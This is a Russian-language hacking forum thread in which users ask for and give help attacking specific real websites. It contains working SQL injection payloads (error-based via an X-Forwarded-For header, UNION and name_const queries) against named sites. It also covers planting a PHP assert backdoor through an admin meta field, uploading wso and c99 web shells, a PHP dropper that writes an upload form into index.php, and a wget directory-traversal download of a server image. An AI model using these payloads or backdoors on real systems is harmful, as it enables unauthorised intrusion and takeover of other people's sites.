Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Так-то она есть

    GET /main.php HTTP/1.1
    Host: www.golowar.ru
    X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((select(concat_ws(0x3a,table_schema,table_name))from(information_schema.tables)limit/**/174,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

    Duplicate entry 'wp:wp_users' for key 'group_key'
     
  2. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Обрами название бд и таблицы апострофами

    `wp`.`wp_users`
     
    _________________________
  3. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Del, thx
     
    #21823 Zed0x, 5 Feb 2013
    Last edited: 13 Jan 2014
  4. BlackIce

    BlackIce Elder - Старейшина

    Joined:
    10 Jan 2013
    Messages:
    108
    Likes Received:
    31
    Reputations:
    27
    Имеется возможность править html код страницы. Когда пишу <?php phpinfo(); ?> оно просто выводится браузером как обычный тег, будто работаю не с пхп страницей. Что можно сделать?
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    ничего
     
    _________________________
  6. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    291
    Likes Received:
    55
    Reputations:
    20
    Кое как залил wso через file_get_contents а там такое и ничего не открывает из меню... Не Sec. Info не Console... В чем дело?
    [​IMG]
     
  7. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23

    Попробуй с99 залить, возможно он будет работать
     
  8. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    291
    Likes Received:
    55
    Reputations:
    20
    c99 вообще не заливается... дело в том, что я пытаюсь залить через
    Через админку, через <meta name="keywords" content="" /> могу править только content так что вписал туда с начала <?assert($_REQUEST[x]);?> и залил wso и ничего не получилось, попробовал вписать " /><?assert($_REQUEST[x]);?><meta name="test" content="

    чтоб запрос в индексе было
    <meta name="keywords" content="" /><?assert($_REQUEST[x]);?><meta name="test" content="" />
    и терь меню шелла доступно, но файлы не показывает, и в консолье команды не выполняются
     
  9. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Так можешь вписать вверху index.php?

    <?php file_put_contents('lala.php', '<?php if(isset($_POST[ok])){if(move_uploaded_file($_FILES[fnm][tmp_name], $_POST[name])){echo "<a href=" . $_POST[name] . ">Click</a>";} else {die("err");}}?><form method=post enctype=multipart/form-data><input type=text name=name><input type=file name=fnm><br> <input type=submit name=ok><br></form>'); ?>
     
    1 person likes this.
  10. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    84
    Likes Received:
    2
    Reputations:
    -5
    Как можно залиться, если доступа к табле юзеров нет?

    http://www.elitdress.ru/catalog/product_info.php?products_id=-0+UNION+SELECT+1,2+--+

    Известен путь: /var/www/masha/data/www/elitdress.ru/catalog/product_info.php
    Известен юзер: masha_elitdress@localhost

    Пробовал через char - не вышло.
    В админку не попасть, хэши не брутятся.
    Пытаюсь залиться через SQL.
     
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    сам же ответил на свой вопрос.
    если file_priv нету или mq=on,
    то через иньекцию залиться не получится.
     
    _________________________
  12. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    291
    Likes Received:
    55
    Reputations:
    20
    Не могу выполнить ни одну команду в консоле, пишет Unable to execute command
    OC Linux Kernel 2.6.32
     
  13. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Нашел и хочу скачать образ системы на сайте (доступно через directory traversal), но acunetix выдает ошибку, не могу мол так много качать и сбрасывает соединение (как повысить лимит, не нашел), если скормить ссылку браузеру, он выдает ахинею (возможно, с потерей информации) и при сохранении ее в файл образ не собирается. У разных браузеров файл получается разного размера, так что этот путь неверен. Flash Get ругается на ссылку и не хочет качать, естественно, ведь она имеет вид site?id=etc/linux.img
    Может кто знает, какой проге надо это безобразие скормить, чтобы нормально скачалось?
    Спасибо
     
  14. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    wget site?id=etc/linux.img -O linux.img
     
  15. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Спасибо, получилось, только образ все равно не собирается почему-то (собирал, используя R-studio)
     
  16. narviss

    narviss New Member

    Joined:
    1 Aug 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Возможно ли раскрутить?
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    допустим можно.
    что дальше?
     
    _________________________
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Можно. Например так

    _ttp://www.personalguide.ru/news/page33_'and(select*from(select+name_const(version(),1),name_const(version(),1))a)='1/

    Duplicate column name '5.3.7-MariaDB-mariadb116~squeeze-log'
     
    _________________________
    1 person likes this.
  19. Yan.Total

    Yan.Total New Member

    Joined:
    13 Feb 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Нашел с помощью сканера. Может, кто подскажет как раскрутить? Не могу понять, куда писать запросы.
    Как понял, знак %5c - это /
     
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Сайт покажи =/
     
    _________________________
Loading...
Thread Status:
Not open for further replies.